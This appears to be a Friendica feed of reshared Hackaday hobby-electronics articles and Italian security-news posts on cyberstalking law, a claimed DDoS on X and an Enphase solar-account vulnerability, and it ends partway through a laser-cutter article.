Prova da Friendica
Prova con testo colorato
Carattere Serif
20 pixel
2 pixel
80 pixel
Test: palestra e allenamenti :-) reshared this.
Handsome Sim Racing Button Box Is A Super Easy Build
Sim racing is a lot more complex than playing Need For Speed 3: Hot Pursuit. You need buttons for all kinds of stuff, from headlights to brake balance to traction control. If you want to control all that in an intuitive and realistic manner, you’ll want to build yourself a decent button pad like [Chris Haye] has done. It’s surprisingly easy, too!Very cool.
[Chris] is quite a serious racer, and needed four button boxes. He wanted to do this on the cheap, so he decided to build his first three boxes around the Zero Delay Arcade USB Encoder, a cheap controller board available on eBay for around £7. Arcade buttons were sourced off Amazon to populate the black project boxes which acted as the housings.
His final button pad looks straight out of a GT3 race car, but it’s the simplest of the bunch. It’s literally just a USB numpad with a carbon vinyl wrap applied and some home-printed labels. One suspects the feel isn’t particularly high-quality but the look is top tier. If you’re a streamer that wants to build a hardcore-looking setup, this is a great way to go.
[Chris] estimates that each box took maybe an hour to build, tops. It’s a great example of solution-focused design. He could have gotten out his own microcontroller and done a custom PCB and all that, and the results surely would have been good. But it would have taken far longer! It’s hard to beat the speed of wiring together Amazon arcade buttons with the Arcade USB Encoder’s pre-terminated wire harness. If you’re more interested in sim racing than building button boxes, it’s a great way to do a custom pad fast.
Best of all? [Chris] says he managed to put these all together for £60—quite a feat of bargain engineering. We’ve featured some other builds along these lines before, too—even using vintage aircraft controls! Video after the break.
Disney vuole che la causa per omicidio colposo che coinvolge un medico di LI venga archiviata, citando i termini di Disney+
Per la Disney, il marito della donna morta nel ristorante non può fare causa da un giudice ma da un arbitro perché tempo prim…
Scimmia di Mare reshared this.
Digital Crime: Alla scoperta del Cyberstalking tra Pene e Sanzioni
Art.612-bis c.p. : Salvo che il fatto costituisca più grave reato, è punito con la reclusione da sei mesi a cinque anni chiunque, con condotte reiterate, minaccia o molesta taluno in modo da cagionare un perdurante e grave stato di ansia o di paura ovvero da ingenerare un fondato timore per l’incolumità propria odi un prossimo congiunto o di persona al medesimo legata da relazione affettiva ovvero da costringere lo stesso ad alterare le proprie abitudini di vita.
La pena è aumentata se il fatto è commesso dal coniuge, anche separato o divorziato, o da persona che è o è stata legata da relazione alla persona offesa ovvero se il fatto è commesso attraverso strumenti informatici o telematici.
La pena è aumentata fino alla metà se il fatto è commesso a danno di un minore, di una donna in stato di gravidanza o di una persona con disabilità di cui all’articolo 3 della legge 5 febbraio 1992, n.104, ovvero con armi o da persona travisata.
Il delitto è punito a querela della persona offesa. Il termine per la proposizione della querela è di sei mesi. La remissione della querela può essere solo processuale. La querela è comunque irrevocabile se il fatto è stato commesso mediante minacce reiterate nei modi di cui all’art.612, secondo comma. Si procede tuttavia d’ufficio se il fatto è stato commesso nei confronti di un minore o di una persona con disabilità di cui all’art.3 della legge 5 febbraio 1992, n.104, nonché quando il fatto è connesso con un altro delitto per il quale si deve procedere d’ufficio.
Il contenuto della norma
L’ articolo 612-bis sanziona coloro che, con condotte ripetute, minacciano o molestano un individuo in modo tale da causare uno stato di ansia o paura prolungato e grave, o inducano un timore fondato per la propria incolumità, quella di un parente stretto o di una persona legata da una relazione affettiva. In aggiunta, punisce chi costringe la vittima a modificare le proprie abitudini di vita. Con il secondo comma, si prevede un aumento della pena nel caso in cui l’azione sia stata compiuta da un coniuge legalmente separato o divorziato o da una persona precedentemente legata da una relazione affettiva con la vittima.
Successivamente, il legislatore ha ampliato il campo di azione considerando la possibilità di atti persecutori tramite mezzi digitali . In pratica, è stata aggiunta alla disposizione esistente la figura del cosiddetto “cyberstalking,” cioè comportamenti persecutori compiuti attraverso l’utilizzo della tecnologia.
Cosa dice la giurisprudenza
Per quanto concerne specificatamente gli atti persecutori realizzati attraverso mezzi digitali la giurisprudenza ha statuito come segue.
Costituisce atto persecutorio ai sensi dell’art. 612 –bis cod. pen. la creazione di falsi profili Facebook e account internet falsi riconducibili alla vittima di stalking qualora i contenuti postati e l’uso di detti profili si rivelino idonei a realizzare molestie reiterate. Nel sancire il principio ivi descritto, la Corte rivede e perfeziona un orientamento da tempo consolidato in base al quale non può dirsi stalking la semplice creazione di un profilo social riconducibile alla vittima, aprendo alla possibilità che simile comportamento si traduca in atto persecutorio laddove le modalità di utilizzo dei profili si connotino per particolare offensività, es. veicolando messaggi diffamatori e immagini offensive,( Cass. , Sez.V, sent. n. 25533/23).
Integra il reato di atti persecutori ex art. 612-bis c.p., la pubblicazione ripetuta su Facebook della fotografia dell’ex compagna, valutata unitamente alle condotte persecutorie commesse negli anni precedenti, tra cui i contatti ripetuti via mail e su Facebook anche con falsi profili, poiché presenta un’evidente natura molesta, dato che tale pubblicazione, anche in ragione della sua notevole capacità diffusiva, contribuisce a creare un clima idoneo a compromettere la serenità e la libertà psichica della persona offesa..( Cass., Sez. V,sent. n. 10680/22. In senso conforme: Cass. , Sez. V, sent.n 1813/22).
Integra il reato di atti persecutori ex art. 612-bis c.p. nei confronti della moglie, la condotta di colui che invia svariati messaggi scritti e vocali, di minacce ed invettive indirizzati al cellulare del figlio della coppia, poiché tale comportamento è certamente idoneo a raggiungere la moglie e a causare nella stessa un grave e perdurante stato di ansia o di paura ( Cass. , Sez. V , sent. n. 19531/22) .
Il comportamento della persona offesa consistente nel bloccare l’utenza telefonica del persecutore, per poi successivamente sbloccarla, ridando così all’agente possibilità di inviare messaggi non graditi, è irrilevante ai fini dell’interruzione dell’abitualità del reato e della continuità delle condotte molestatrici, laddove queste, complessivamente valutate, risultino idonee a cagionare uno degli eventi alternativi previsti dalla fattispecie incriminatrice degli atti persecutori (Cass., Sez. V, sent. n.44628/21).
Interessante anche altra pronuncia relativa ad un ex che per vendicarsi del fatto che l’amante aveva rivelato della relazione alla moglie aveva aperto un profilo fb dedicato a postare foto , video e commenti con riferimenti alla sua ex amante. In questo caso si riconosce la sussistenza del reato, considerandosi irrilevante il fatto che la donna potesse non conoscere di questi contenuti, non accedendo a tale profilo, rilevando comunque l’attitudine dannosa dal fatto che comunque sono stati provati stato di ansia e mutamento abitudini di vita della vittima (Cass., Sez. V, sent.n.57764/17).
E’stato considerato stalking la condotta dell’ex fidanzato che creava profili falsi a nome della vittima su social network frequentati da soggetti in cerca di esperienze, i quali la contattavano credendola disponibile per i propri interessi. La Corte di Cassazione ha ritenuto che la condotta sopra citata, insieme ai ripetuti episodi di minacce, persecuzioni e atti di violenza nei confronti della parte offesa integrasse senza dubbio il reato di stalking (Cass., Sez.Fer., sent. n.36894/15).
L'articolo Digital Crime: Alla scoperta del Cyberstalking tra Pene e Sanzioni proviene da il blog della sicurezza informatica.
Handheld Oscilloscope Meter Reviewed
We live in a time where there’s virtually no excuse not to have some kind of oscilloscope. As [IMSAI Guy] shows in a recent video, for what you might expect to pay for a decent meter, you can now get one that includes a scope. There are several options out there but it is hard to know how much to spend to get the best possible product. The Zoyi ZT-702S that he looks at costs under $80. But is it worth it?
Scopes that connect to your PC are often very inexpensive. You can also find little toy scopes that use a microcontroller and a little LCD screen. Even though the specs on these are usually appalling, they will still let you visualize what’s happening in a circuit. Sure, you want an expensive bench scope with lots of channels sometimes, but often, you just need to see a signal in broad strokes. Having a scope and a meter together is very handy.
The little meter claims 10 MHz bandwidth and 48 megasamples per second in scope mode. The meter claims true RMS and 9999 counts. The internal battery charges from USB-C. As you might expect, the meter portion works well enough for a basic meter. The scope reacts well up to 5 MHz. It isn’t necessarily the best scope in the world, but for $80 it seemed quite adequate. The probe compensation wasn’t able to quite make a square wave square, but you still got the idea.
As commenters on the video pointed out, there is a newer model that has two channels (at a slightly higher price tag). They also point out that there are dozens of similar devices at different price points, and everyone has their favorite.
If you have hobby-level cash, we’d suggest a higher-end scope meter like an OWON or Hantek since the professional brands are still very expensive. We wonder what the designer of 1983’s Pocket-O-Scope would think of these modern devices.
FLOSS Weekly Episode 796: Homebrew, I’m More of a Whopper Guy
This week Jonathan Bennett and David Ruggles chat with John Britton and Mike McQuaid about Homebrew! That’s the missing package manager for macOS; and Workbrew, the commercial offering built on top of it. We cover lots of territory, like why the naming scheme sounds like it was conceived during a pub visit, how Workbrew helps businesses actually use Homebrew, and why you might even want to run Homebrew on a Linux machine!
Homebrew 15th Anniversary Stream with Creator Max Howell – workbrew.com/homebrew-turns-15
Strap – Bootstrap your macOS development system – strap.mikemcquaid.com/feed/ && github.com/MikeMcQuaid/strap
Homebrew Bundle – Bundler for non-Ruby dependencies from Homebrew, Homebrew Cask, and the Mac App Store – github.com/Homebrew/homebrew-b…
MAS Mac App Store command line interface – github.com/mas-cli/mas
Dotfiles
Mike’s Dotfiles – github.com/MikeMcQuaid/dotfile…
John’s Dotfiles – github.com/johndbritton/dotfil…
Brewfiles
Mike’s Brewfile – github.com/MikeMcQuaid/dotfile…
John’s Brewfile – github.com/johndbritton/dotfil…
youtube.com/embed/x62E8_AIHRM?…
Did you know you can watch the live recording of the show Right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.
play.libsyn.com/embed/episode/…
Direct Download in DRM-free MP3.
If you’d rather read along, here’s the transcript for this week’s episode.
Places to follow the FLOSS Weekly Podcast:
X attacco mirato o guasto tecnico? C’è chi conferma l’attacco DDoS: Qi An Xin XLAB
Elon Musk, ha affermato che la piattaforma social X (ex Twitter) è stata colpita da un attacco DDoS (Distributed Denial-of-Service) alcuni minuti prima che partisse l’intervista di Elon Musk all’ex presidente Donald Trump. La conversazione ospitata su X Spaces era programmata per iniziare alle 20:00 di lunedì sera, ma si è bloccata quasi subito e 18 minuti dopo Musk ha reso noto il problema: un “massivo attacco DDos”.
Fonte: x.com/elonmusk/status/18231521…
Mentre molti suggeriscono che non si è verificato alcun attacco, un’analisi della società di sicurezza informatica cinese Qi An Xin XLAB – specializzata in threat intelligence con sede ad Hong Kong – indica invece che l’attacco si è verificato eccome. Questa sovietà ha ottenuto riconoscimenti internazionali fungendo da sponsor ufficiale dei servizi di sicurezza informatica e del software antivirus alle Olimpiadi invernali di Pechino 2022, dove ha ottenuto un encomiabile record di “zero incidenti”.
In breve:
- Le prime valutazioni contradditorie
- X attacco DDoS confermato e la nuova botnet Mirai.zushi: l’analisi di Qi An Xin XLAB
- Gli eventi paralleli
Non appena ci saranno aggiornamenti questo articolo sarà aggiornato.
Le prime valutazioni contraddittorie
Le note della collettività (community notes) hanno portato le loro valutazioni che sono per lo più contraddittorie – positive o negatve – in assenza totale di dati. Una nota in fase di valutazione indica il fatto seguente: “I resoconti dei dipendenti X indicano che non c’era assolutamente alcuna indicazione di un attacco DDOS. Un attacco avrebbe compromesso l’intero servizio, che è rimasto online e funzionante. Un dipendente di X avrebbe affermato che c’era una probabilità del “99%” che Musk stesse mentendo”. Tuttavia non si sa cosa sia meglio a questo punto cosa dichiare: un problema tecnico o problemi nella mitigazione degli attacchi e prevenzione della sicurezza della piattaforma. Un attacco DDos infatti potrebbe esporre a rischi ben peggiori di una semplice interruzione di servizio, ma allo stesso tempi ci sono di mezzo le elezioni e soprattutto la figura di Donald Trump. Cosa dichiarare? Altre note critiche si riferiscono a tweet non più esistenti e cancellati o a ipotesi che riguardano tagli di costi (server che quindi non reggono il carico) e tagli di personale.
In altri commenti viene chiesto se si fosse trattato di un vero e proprio attacco DDOS o semplicemente di un gruppo di persone che tentando di entrare nello spazio hanno “causato un Denial of Service”.
Insomma una serie di ipotesi senza dati alla mano che si è tradotta in un grande caos sul quale si discuterà parecchio poiché la piattaforma X possiede la capacità di influenzare tecnologia, media e politica americana, trasformandosi in un campo di battaglia online.
The Verge, ha evidenziato il fatto che il resto di X sembrava funzionare normalmente e la sua fonte, un dipendente di X, avrebbe confermato che non si trattava un attacco denial-of-service (DoS) e che con il 99% delle probabilità Musk aveva mentito. [In realtà però è stato comunicato si sia trattato di un Distributed Denial-of-Service (DDoS), quest’ultimo a differenza del primo necessita di una rete di botnet a più sistemi, un tipo di attacco che può essere programmato ad un orario specifico e può durare anche giorni].
Ma a sostegno della tesi di The Verge c’è un precedente: le difficoltà tecniche sperimentate nel 2023 dal governatore della Florida DeSantis nel suo livestream. Allora, a pochi minuti dall’inizio, l’audio si interruppe nei primi minuti dell’evento. Allora la colpa fu data al sovraccarico dei server e la CNN evidenziò la riduzione di server e di personale da parte di Musk per contenere i costi. (Il fallimento dell’intervista ha ricordato l’annuncio del governatore della Florida Ron DeSantis su X del 2023 di essere candidato alla presidenza, anch’esso iniziato con difficoltà tecniche. All’epoca Musk attribuì i problemi ai server sovraccarichi).
X attacco DDoS confermato: l’analisi di Qi An Xin XLAB
Ad accertare l’attacco DDos in data 13 agosto è stata l’agenzia di cyber security cinese Qi An Xin XLAB, come si legge sulla loro pagina del blog. Secondo la sua analisi non si tratterebbe di un semplice guasto tecnico, ma di un attacco informatico mirato.
Fonte: Qi An Xin XLAB su X
Gong Yiming, il capo del laboratorio, ha dichiarato: “Abbiamo osservato che quattro botnet master Mirai” – nominata Mirai.zushi* – insieme ad altri gruppi hanno utilizzato altri metodi come reflection attacks (nuova tecnica d’attacco che sfrutta il protocollo CLDAP per amplificare la potenza dei Ddos) o attacchi proxy HTTP.
L’attacco ha “comportato l’inondazione del bersaglio con enormi quantità di richieste HTTP, utilizzando numerosi proxy e macchine VPS, fino al completo esaurimento delle risorse del bersaglio. I payload di queste richieste HTTP indicano un’operazione altamente mirata, specificamente rivolta all’account Twitter personale di Donald Trump su https://x.com/realdonaldtrump/. I payload esatti dell’attacco sono dettagliati di seguito”.
Fonte: Qi An Xin XLAB blog
L’analsi dimostra che “quattro botnet masters hanno lanciato almeno 34 ondate di attacchi DDoS, principalmente nel Regno Unito, in Germania e in Canada.
“L’attacco è iniziato alle 8:37, ora di Pechino. L’attacco è durato fino alle 9:28 l’attacco è durato 50 minuti, il che è sostanzialmente coerente con il tempo di ritardo dell’intervista.” Inoltre XLAB ha affermato che il tempo di attacco “particolarmente lungo è una caratteristica notevole di questo attacco. Le statistiche mostrano che la stragrande maggioranza degli attacchi DDoS dura pochi minuti, alcuni durano anche solo pochi secondi, il che può causare ingenti danni al sistema bersaglio. Tuttavia, l’attacco è durato quasi un’ora e ha dimostrato che l’aggressore era ben preparato e altamente mirato”.
Fonte: Qi An Xin XLAB blog
*“La botnet Mirai.zushi, una variante relativamente nuova della famiglia Mirai, si è evoluta da giugno di quest’anno e ha già infettato circa diecimila dispositivi. Utilizza la crittografia RC4 per il traffico di comunicazione. Gli operatori di Mirai.zushi sono associati al canale social media https://t.me/uglybotnet”. _ Qi An Xin XLAB
Gli eventi paralleli
Inoltre l’FBI ha dichiarato all’inizio di questa settimana di avere aperto un’indagine sul presunto hacking di documenti appartenenti alla campagna dell’ex presidente Donald Trump. Le accuse sono state dirette all’Iran, giorni dopo che Microsoft ha rivelato che Teheran avrebbe intensificato l’attività online nel tentativo di influenzare le elezioni statunitensi. Secondo Microsoft una campagna presidenziale era stata presa di mira da un attacco di phishing via email a giugno. “Politico” ha inoltre dichiarato di avere ricevuto e-mail anonime che includevano documenti interni all’operazione elettorale di Trump.
Ma non sarebbe la prima interferenza elettorale: nelle elezioni del 2016 furono accusati i russi per aver preso di mira le elezioni di Hillary Clinton, compromettendo i database di registrazione degli elettori in diversi stati. Il problema però è che alla DEFCON ogni anno si trovano vulnerabilità e difetti nel sistema di voto a cui corrisponde nella lentezza di implementazione di soluzioni proattive.
Il giorno precedente all’intervista, Thierry Breton, funzionario dell’Unione Europea aveva pubblicato una lettera inviata a Musk, avvertendolo della potenziale ’”amplificazione di contenuti dannosi” in relazione agli eventi nel Regno Unito e la sua intervista con Donald Trump. Non è la prima volta che l’Europa si esprime sulle elezioni di un altro paese: la presidente della Commissione europea Ursula von der Leyen mise in guardia l’Italia nelle ultime elezioni dove già si prevedeva la vittoria di Giorgia Meloni e provocò la reazione di chi la sosteneva. E nemmeno le reazioni di Elon Musk si sono fatte attendere. Ma questa è la politica, nulla di nuovo o di pauroso.
L'articolo X attacco mirato o guasto tecnico? C’è chi conferma l’attacco DDoS: Qi An Xin XLAB proviene da il blog della sicurezza informatica.
🔁 Gli studenti perdono l'accesso a Internet e gli appunti sui dispositivi di apprendimento personali a causa di problemi tecnici con l'app Mobile G...
Gli studenti perdono l'accesso a Internet e gli appunti sui dispositivi di apprendimento personali a causa di problemi tecnici con l'app Mobile Guardian
pillole.graffio.
Informa Pirata: informazione e notizie
Gli studenti perdono l'accesso a Internet e gli appunti sui dispositivi di apprendimento personali a causa di problemi tecnici con l'app Mobile Guardian https://pillole.graffio.Telegram
reshared this
Hacker Tactic: Pimp Your Probes
Is your multimeter one of your trusty friends when building up boards, repairing broken gadgets, and reverse-engineering proprietary ones? Is it accompanied by a logic analyzer or an oscilloscope at times?
Having a proper probing setup is crucial for many a task, and the standard multimeter probes just won’t do. As a PCB is slipping under your grip as you’re trying to hold the standard multimeter probes on two points at once, inevitably you will ponder whether you could be doing things differently. Here’s an assortment of probing advice I have accumulated.
Beyond The Norm
There’s the standard advice – keep your board attached firmly to a desk, we’ve seen gadgets like the Stickvise help us in this regard, and a regular lightweight benchtop vise does wonders. Same goes for using fancy needle probes that use gravity to press against testpoints – they might be expensive, but they are seriously cool, within limits, and you can even 3D-print them!
Both of these become insufficient at some point, sadly – sometimes you need to change the probing spots so often that the gravity probes become bothersome, sometimes the board is double-sided and you need to flip it for tracing a connection, and sometimes you want to do current injection where the probing point actually matters. Default multimeter probes are nice, but they are also dull to the point it’s easy to short adjacent IC pads if you’re not careful.Two most helpful probes in my toolkit
So, where do you go? My advice is, fashioning your own probes or buying nonstandard ones. Ever find a set of broken multimeter probes? Good, you can use them up as banana jack pigtails, a piece of solderable wire with a banana jack on one end. Don’t got some broken probes? Just buy a cheap set and harvest wires from it, or build some out of screwpost banana jacks. You can fashion a fair few things with solderable banana leads – let’s take a look!
Just Solder It On
The first advice I have is literally soldering such pigtails to a GND pad on your board. This is wonderful if you have to constantly probe voltages relative to GND, soldering a wire to GND is a serious timesaver – it frees up one of your hands, and unlike crocodile clip probes, it is not terribly likely to break off silently while you’re in the middle of debugging. If you must probe between two non-soldered-to points, feel free to temporarily swap in a usual probe – that’s why I recommend a spare probe wire for this!
If GND is your reference and you’re tempted to use something that looks like it should be GND, make sure your probe soldering point is GND-connected! USB-C sockets are a good starting point for this – all USB-C sockets must have their shield grounded, no matter the device. Of course, before assuming that a certain connector shield is ground, you must check that it actually connects to the board’s ground, which should be easy to find on your board’s inevitably present decoupling capacitors.For reliable and easy measurements, just solder the probe wire on!
Soldering won’t work for smaller testpoints, unless you use a piece of magnet wire for the last-inch part and hotglue or tape the probe wire to the board. If you don’t do one of these, the wire will either break away from the board easily, or even tear your testpoint off the board completely; many times I have foolishly tried to directly solder thick wires to small pads, and it invariably resulted in torn off pads, so I recommend you skip this step. For logic analysis, soldering 2.54 mm header wires in the same fashion is pretty convenient – I often use stray female-male wires from my bench for this.
Of course, if you have a multimeter lead with a solderable end, you can easily convert it to a croc clip end – those are also quite handy for times when you don’t want to bother soldering or can’t do it! You can buy a set of decent croc clip probes, but if you haven’t yet, a broken probe and a croc clip end will do just fine. Apart from the usual things you would use a crocodile clip for, there’s one more purpose you might not have considered!
Reusing Metal Brushes And Tweezers
a reverse-engineer’s best friend
I’ve done a fair bit of reverse-engineering where my task was to figure out all connections to a certain pad, usually on multi-layer boards with no visible tracks in sight. In laptop repair, you would usually use a boardview for this, but they’re rarely available for generic devices, and while that Nintendo Switch flying wire reverse-engineered boardview is impressive, it’s not about to become a hacker household staple, unless everyone levels up their skills real quick.
Enter metal brushes – of the kind you find in dremel and other rotary tool kits. Where does a certain pin of an IC lead? One probe wire held onto the pin, another probe is a croc clip holding the metal brush that you gently caress your board with; not too strongly so as to scratch the soldermask, but strongly enough to break through the oxides on the solder joints. I keep two sizes – one large and one small, using the large one first to find the general contact areas, and then using the small brush to narrow it down.
These are instrumental for many a black box board, and so are metal SMD tweezers – as long as they’re sharp to a point, you can use them as super sharp multimeter probes. Spread the tweezer legs, insert your wire up to the very top of the join point, then release the tweezers, and make sure it doesn’t fail a continuity test. Congrats, you have just acquired a probe sharp enough to probe 0.5 mm pitch pins with ease. As long as your parallax vision doesn’t fail you, you will do just fine, which is to say, it will be less of a struggle than usual. I use Rhino tweezers that you can get on Adafruit, Dangerous Prototypes, or Aliexpress – they are super sharp and durable in long term.
Much More Cool Stuff To Learn
Summary – have some solderable banana jack pigtails handy, which you can make out of old or cheap probes. You can use them to free up a hand while probing or do current injection. In a pinch, you can use metal brushes held in croc probes for reverse-engineering, and tweezers holding solderable leads for fine point probing. With these tricks, you will find that many kinds of probing and repair work gets easier and way less failure-prone.
Now, these aren’t the only probe hacks; for instance, when using an oscilloscope and measuring high-speed signals or power rails, upgrading your ground connection can give you a significantly cleaner signal. Also, don’t be afraid of making custom jigs for testing your boards, and don’t forget about probing for ESD diodes!
Un bug sui sistemi di gestione dei Pannelli Solari consente di Spegnere 4 Milioni di installazioni in 150 Paesi
Il problema della vulnerabilità delle tecnologie “intelligenti” sta diventando sempre più acuto. L’hacker olandese Wietse Boonstra ha recentemente dimostrato la gravità di tali minacce scoprendo la possibilità di spegnere 4 milioni di sistemi di energia solare in 150 paesi con il semplice clic di un pulsante. La scoperta ha confermato la legge di Hypponen: “Se qualcosa è intelligente, è vulnerabile”.
La portata della minaccia è impressionante. I pannelli solari nei Paesi Bassi possono produrre energia paragonabile alla produzione di quaranta centrali nucleari di tipo Borssele. Molti produttori però non offrono una protezione sufficiente contro gli hacker.
Boonstra, ricercatore sulla sicurezza presso la Judicial IT Organization (JIO), ha scoperto una grave falla nei sistemi di Enphase. Negli ultimi mesi la sua attenzione si è concentrata sui dispositivi che collegano i pannelli solari alla rete elettrica.
Sebbene il principio di funzionamento dei pannelli solari sia semplice – producono corrente continua, che viene poi convertita in corrente alternata per alimentare la rete – utilizza un inverter. Nei sistemi Enphase ogni pannello è dotato del proprio microinverter.
I clienti Enphase possono configurare e gestire i propri sistemi tramite un account personale, con la possibilità di delegare il controllo ad altri. Boonstra ha identificato una vulnerabilità critica: un bug nel software ha permesso di ottenere i diritti di amministratore sugli account di altre persone. Mettendo alla prova la sua teoria, creò due account amministrativi e scoprì che il primo poteva gestire il secondo senza permesso. Per la verifica finale, ha creato altri venti account e li ho gestiti con successo tutti attraverso il primo.
Insieme al collega Hidde Smith, Boonstra ha esaminato il firmware dei dispositivi Enphase e ha scoperto sei vulnerabilità che potrebbero essere utilizzate per infettare milioni di sistemi solari con del malware.
Questa situazione è paragonabile al concetto di “Unico Anello” de “Il Signore degli Anelli” di Tolkien: proprio come un anello controllava gli altri, così la vulnerabilità identificata consente il controllo di milioni di sistemi attraverso un account, il che minaccia la sicurezza energetica globale.
La vulnerabilità dei Paesi Bassi al sabotaggio della rete elettrica è in aumento. L’interconnessione dei sistemi di energia solare, delle stazioni di ricarica e delle batterie gestite centralmente rende il Paese più suscettibile a tali minacce. Gli esperti avvertono che la responsabilità della stabilità non può più spettare esclusivamente agli operatori di rete.
Nei Paesi Bassi i pannelli solari generano circa venti gigawatt di energia, paragonabili alla potenza di quaranta centrali nucleari. Una perdita improvvisa anche di pochi gigawatt può destabilizzare seriamente la rete elettrica.
L'articolo Un bug sui sistemi di gestione dei Pannelli Solari consente di Spegnere 4 Milioni di installazioni in 150 Paesi proviene da il blog della sicurezza informatica.
🔁 💰 Soldi pubblici -> software pubblico 🇨🇭 La Svizzera ha fatto una mossa rivoluzionaria: una nuova legge obbliga tutti i software utilizz...
💰 Soldi pubblici -> software pubblico
🇨🇭 La Svizzera ha fatto una mossa rivoluzionaria: una nuova legge obbliga tutti i software utilizzati nella pubblica amministrazione a essere rilasciati come opensource.
Informa Pirata: informazione e notizie
💰 Soldi pubblici -> software pubblico 🇨🇭 La Svizzera ha fatto una mossa rivoluzionaria: una nuova legge obbliga tutti i software utilizzati nella pubblica amministrazione a essere rilasciati come opensource.Telegram
Informa Pirata likes this.
Informa Pirata reshared this.
🔁 Dimenticare Musk, che fa peggio di Porta a Porta feddit.it/post/10100695 Il nuovo post di ferrante è su feddit.it/c/giornalismo Dimentic...
Dimenticare Musk, che fa peggio di Porta a Porta
feddit.it/post/10100695
Il nuovo post di ferrante è su feddit.it/c/giornalismo
Dimenticare Musk, che fa peggio di Porta a Porta
@Giornalismo e disordine informativo
articolo21.
Informa Pirata: informazione e notizie
Dimenticare Musk, che fa peggio di Porta a Porta https://feddit.it/post/10100695 Il nuovo post di ferrante è su feddit.it/c/giornalismo Dimenticare Musk, che fa peggio di Porta a Porta @giornalismo articolo21.Telegram
Giornalismo e disordine informativo reshared this.
🔁 L’intervista di Elon Musk a Donald Trump ha sviluppato un self DDoS sulla sua stessa piattaforma feddit.it/post/10088216 Il nuovo post d...
L’intervista di Elon Musk a Donald Trump ha sviluppato un self DDoS sulla sua stessa piattaforma
feddit.it/post/10088216
Il nuovo post di cybersecurity è su feddit.
Informa Pirata: informazione e notizie
L’intervista di Elon Musk a Donald Trump ha sviluppato un self DDoS sulla sua stessa piattaforma https://feddit.it/post/10088216 Il nuovo post di cybersecurity è su feddit.Telegram
A Really Low Level Guide To Doing Ethernet on an FPGA
With so much of our day-to-day networking done wirelessly these days, it can be easy to forget about Ethernet. But it’s a useful standard and can be a great way to add a reliable high-throughput network link to your projects. To that end, [Robert Feranec] and [Stacy Rieck] whipped up a tutorial on how to work with Ethernet on FPGAs.
As [Robert] explains, “many people would like to transfer data from FPGA boards to somewhere else.” That basically sums up why you might be interested in doing this. The duo spend over an hour stepping through doing Ethernet at a very low level, without using pre-existing IP blocks to make it easier. The video explains the basic architecture right down to the physical pins on the device and what they do, all the way up to the logic blocks inside the device that do all the protocol work.
If you just want to get data off an embedded project, you can always pull in some existing libraries to do the job. But if you want to really understand Ethernet, this is a great place to start. There’s no better way to learn than doing it yourself. Files are on GitHub for the curious.
Laser Cutters: Where’s the Point?
It is funny how when you first start doing something, you have so many misconceptions that you have to discard. When you look back on it, it always seems like you should have known better. That was the case when I first got a low-end laser cutter. When you want to cut or engrave something, it has to be in just the right spot. It is like hanging a picture. You can get really close, but if it is off just a little bit, people will notice.
The big commercial units I’ve been around all had cameras that were in a fixed position and were calibrated. So the software didn’t show you a representation of the bed. It showed you the bed. The real bed plus whatever was on it. Getting things lined up was simply a matter of dragging everything around until it looked right on the screen.
Today, some cheap laser cutters have cameras, and you can probably add one to those that don’t. But you still don’t need it. My Ourtur Laser Master 3 has nothing fancy, and while I didn’t always tackle it the best way, my current method works well enough. In addition, I recently got a chance to try an XTool S1. It isn’t that cheap, but it doesn’t have a camera. Interestingly, though, there are two different ways of laying things out that also work. However, you can still do it the old-fashioned way, too.
Humble Beginnings
I started out with a Laser Master 2, but it really had no comfort features. You had to focus the laser by observing the beam, and there was nothing to help you with positioning. I thought I would be clever and have the laser cut a grid into a spoil board so I could lay things out. That didn’t work well at all.
There are a few reasons a grid like that isn’t as useful as you’d think. First, if you do want to try it, the board needs to be totally secure with respect to the laser cutter’s frame. Otherwise, if the board or laser moves, you are now off. Even just a little tilt or slide will show up in the finished product. But the big problem is the workpiece has to be totally square with the frame, or things will be crooked.
A Better Plan
It didn’t take many ruined pieces to realize I needed a better way. The answer turned out to be wrapping paper. A trip to the dollar store will give you plenty of wrapping paper, and it can be ugly — you don’t care what it looks like since you’ll use the back.Leather notebooks engrave well if you can keep them straight and centered
Suppose I’m going to engrave a notebook with a logo and name. I’ll have some outline representing the book. The steps are simple:
1) Put down the wrapping paper and tape it to the cutter’s bed.
2) Turn off everything and then turn on just the outline vector.
3) Focus on the paper and do the engrave.
Now, you have a perfect book-shaped rectangle on the paper. If the bed is tilted, it doesn’t matter because so is the rectangle.
4) Place the book inside the outline on the paper.
5) Refocus the laser.
6) Turn off the outline layer and turn on the other layers.
7) Burn!
The Laser Master 3 added a nice feature, which was a little hinged stick that flops out of the laser and lets you easily set the focus. I’d been doing that before with a little homemade cube, but it was nice to have it all set up.
No Camera, No Problem
The S1 is a fairly high-end machine for a diode laser, so I was a little surprised it didn’t have a camera. However, what it does have is closed-loop motor control. What that means is that if you move the laser head with your hands, the machine still knows where it is. There’s also a little laser pointer cross that shows you where the laser head is — sort of. There is an offset between the actual beam and the cross, but if you use their software, they know that. If you use Lightburn, you have to set that yourself.
So if you have a book you want to engrave on the bed, you tell the software to “mark.” It lets you pick a few shapes, but usually, you want a rectangle. You line up the laser cross with the top corner of the book (or whatever) and press the button on the machine. You hear a loud beep. Then, you move to the far bottom corner and press the button again. That’s it.
Now, the software will place a little box that shows exactly where the book is. This doesn’t help you correct for small skew problems, but it does let you accurately move things to the right location.
The machine also has an interesting way of dealing with autofocus. It has a metal pin that drops from the laser head sort of like a BL Touch on a 3D printer. When it hits something, it knows how far away the surface is. Then, it moves to a corner where a metal plate pushes the pin back up. You need to make sure the head is over something before you tell it to measure. If you have a honeycomb bed, the laser head will bottom out before the pin, and you’ll hear some ugly noises.
But A Picture is Worth…
If you can’t stand not having an image of your workspace, the S1 can do it, but honestly, it is a pain. The printer comes with little sticky target decals, and you can make more if you need them. Three of them look like little bullseyes, and one is just a small dot. You place them somewhere on the bed where the laser can reach.A phone camera image of the bed with a purple vector overlaid
After you install the phone app, you can connect to the printer and calibrate the dots. You do this just like the marking routine. You aim at each target and press the button. Now, the software knows exactly where each bullseye is.
The next step is to take a picture of the bed with your phone. Since the software knows the bullseyes are circles and where they are, it can reconstruct a proper view of your bed. Moving it to your computer is a pain the first time since you have to scan a QR code on the computer to make a connection. After that, though, it just sends it. The problem, of course, is the shot isn’t live. You have to fix up the bed the way you want, shoot the picture, and then don’t change anything after that.
One tip: don’t cut anything on top of the bullseyes. They will blacken up and then you’ll need some extras. Not that we’ve done that, of course!
The Answer
